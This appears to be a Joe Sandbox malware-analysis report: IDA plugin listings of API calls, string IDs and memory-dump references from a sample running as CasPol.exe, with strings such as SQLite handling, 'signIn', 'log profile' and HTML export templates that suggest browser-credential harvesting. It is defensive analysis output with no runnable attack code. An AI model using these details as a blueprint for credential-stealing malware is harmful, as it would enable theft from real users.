                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                  • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                  • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                  • String ID: ($d
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                  • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                  • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                  • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                  • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                  • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                  • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00413C4E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                  • String ID: 3A
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                  • String ID: AE$.cfg$General$EA
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: -journal$-wal
                                                                                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3975816621-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                  • API String ID: 1214746602-2708368587
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2047574939-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 161710377-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                  • API String ID: 3510742995-2446657581
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                  • String ID: 6$\
                                                                                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                    • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                  • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
